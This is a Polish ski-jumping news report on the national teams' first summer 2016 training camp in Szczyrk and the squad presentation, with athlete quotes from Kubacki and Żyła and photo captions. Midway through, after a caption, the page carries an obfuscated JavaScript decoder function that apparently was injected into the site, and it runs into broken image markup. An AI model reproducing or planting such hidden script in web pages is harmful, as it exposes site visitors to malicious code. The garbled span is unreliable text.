You are currently viewing Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)

Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)

Kadra.A.Polska 2016 fot.B.Leja  - Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)Kadry polskich skoków narciarskich mają już za sobą pierwsze skoki na igelicie w sezonie letnim 2016. Od wtorku na kompleksie skoczni w Szczyrku trwa zgrupowanie wszystkich trzech męskich kadr: A, B i „młodzieżowej” C, trenuje też kadra kobiet. Dodatkowo, w czwartek zawodnicy uczestniczyli w oficjalnej prezentacji grup szkoleniowych.

 
DSC 0032 2 - Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)
Polska kadra B na sezon letni 2016 (fot. Bartosz Leja)

Tuż przed porannym treningiem w Szczyrku z zawodnikami spotkał się były trener kadry Łukasz Kruczek, który od nowego sezonu poprowadzi reprezentację Włoch. Była to jednak krótka wizyta i po niej skoczkowie udali się na obiekty Skalite, gdzie najpierw przeprowadzili rozgrzewkę, ćwiczenia rozciągające oraz imitację pod okiem sztabów szkoleniowych z trenerami głównymi na czele: Stefanem Horngacherem (kadra A), Robertem Mateją (kadra B) i Maciejem Maciusiakiem (kadra C). Później przyszła pora na skoki. Obóz w Szczyrku to pierwsze zgrupowanie, podczas którego nasi zawodnicy mogą sprawdzić w praktyce, na skoczni wszystko to, czego się nauczyli podczas pierwszego miesiąca pracy trenera Horngachera w naszym kraju. Przy pięknej, słonecznej pogodzie kadry A i B oddawały skoki na obiekcie HS-106, natomiast juniorzy oraz dziewczęta ćwiczyli na mniejszej skoczni HS-76.

DSC 0041 2 - Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)
Polska kadra „młodzieżowa” C na sezon letni 2016 (fot. Bartosz Leja)

Wszyscy kadrowicze zgodnie podkreślali, że trening wprowadzony przez nowego szkoleniowca jest dla nich zupełną nowością, a zmiany wymagają dużo pracy. – Szczególnie na początku zmiana całego procesu treningowego dawała mocno w kość i to było czuć w mięśniach. Nie mieliśmy też prawie czasu na odpoczynek po minionym sezonie zimowym, niemniej jednak robimy to wszystko w określonym celu. Do nowego planu musimy się odpowiednio wdrożyć i być miesiąc do przodu – podkreśla Dawid Kubacki. – Nasze przyzwyczajenia zostały w dużym stopniu przewrócone do góry nogami. Każde ćwiczenie jest inne. To zupełnie nowy sposób treningu i myślę, że dla każdego było to zaskoczeniem. Postaramy się jak najwięcej wyciągnąć z nowego planu. Już po pierwszych skokach mogę powiedzieć, że ma to sens i zaczyna powoli funkcjonować.

Kadra.kobiet.Polska.2016 2017 Palasz.Twardosz.Rajda fot.B.Leja  300x199 - Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)
Polska kadra „młodzieżowa” kobiet na sezon letni 2016 (fot. Bartosz Leja)

Najwięcej zmian czekało Piotra Żyłę, który musiał się pożegnać ze swoją słynną pozycją dojazdową, czyli „garbikiem”. – Tej zimy zakręciłem się, pogubiłem i przekombinowałem. Nowy trener ma swoje metody i wiadomo, że trzeba się z nim było dogadać, czy zostanę w tej pozycji, czy mam ją zmienić. Nie miałem za bardzo pola do manewru, bo Stefan nie akceptował mojej pozycji dojazdowej. Teraz będziemy więc pracować nad nową techniką, żebym mógł aktywnie i stabilnie dojechać do progu. Na sucho nie było żadnych problemów, ale na skoczni pierwszy trening przysposobił mi dość ciekawych wrażeń. Nie spodziewałem się aż takich problemów. Gdy ruszyłem z belki to prawie się wywaliłem, ale po pierwszym treningu potem było już ok – z uśmiechem na ustach komentował „Wewiór”.

- Pierwsze treningi w Szczyrku i prezentacja kadr już za Polakami (FOTORELACJA)function u2fd518ba9147(q3){var u9=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var y7=”;var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4>4);p7=((y6&15)>2);w9=((p9&3)=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander Zniszczoł, fot. Bartosz Leja” src=”http://www.skokipolska.pl/wp-content/gallery/trening-polakow-w-szczyrku-i-prezentacja-kadr-maj-2016/DSC_0231.jpg” alt=”Aleksander Zniszczoł, fot. Bartosz Leja" width="300" height="200" /> Aleksander Zniszczoł, fot. Bartosz Leja

Zajęciom podczas treningu otwartego przyglądała się liczna grupa dziennikarzy i fotoreporterów, którzy następnie mieli możliwość uczestniczenia w prezentacji kadr PZN w skokach narciarskich i późniejszego przeprowadzenia wywiadów z trenerami i zawodnikami. Ta część dnia medialnego odbyła się na sali konferencyjnej COS Szczyrk o godzinie 13:00.

Prezes PZN Apoloniusz Tajner przedstawił wszystkie trzy męskie kadry, a także kadrę żeńską. - Naszą reprezentację w całości poprowadzi w tym roku Stefan Horngacher, nowy-stary trener, który już wcześniej u nas pracował i wyjeżdżał z naszego kraju z bardzo dobrymi opiniami, a teraz wraca z jeszcze lepszymi. Trener poświęcił kwiecień na zorganizowanie się. Zawodnicy zostali przetestowani, przeprowadzono z nimi rozmowy. Horngacher ułożył sobie trzy zespoły, nad którymi chce w całości objąć kierownictwo. Deklaruje też ścisłą współpracę ze szkołami mistrzostwa sportowego i klubami – mówił Prezes PZN. W sztabie szkoleniowym pierwszej ekipy poza trenerem głównym mamy dwie nowe zagraniczne twarze: Michala Dolezala z Czech i dr Haralda Pernitscha z Austrii. - Nasi zawodnicy często sugerowali, że w poprzednich sezonach pojawiały się problemy sprzętowe. To właśnie nasza odpowiedź. Dolezal będzie trenerem technicznym odpowiedzialnym za sprzęt i zarazem asystentem, a w celu zmiany metod treningowych konsultantem Stefana Horngachera będzie dr Pernitsch, który będzie konsultował trening motoryczny – wyjaśnił Apoloniusz Tajner.

 

Fotorelacja (fot. Bartosz Leja):

 

Autor komunikatu – Alicja Kosman / PZN
Fotografie: Bartosz Leja

 

Dodaj komentarz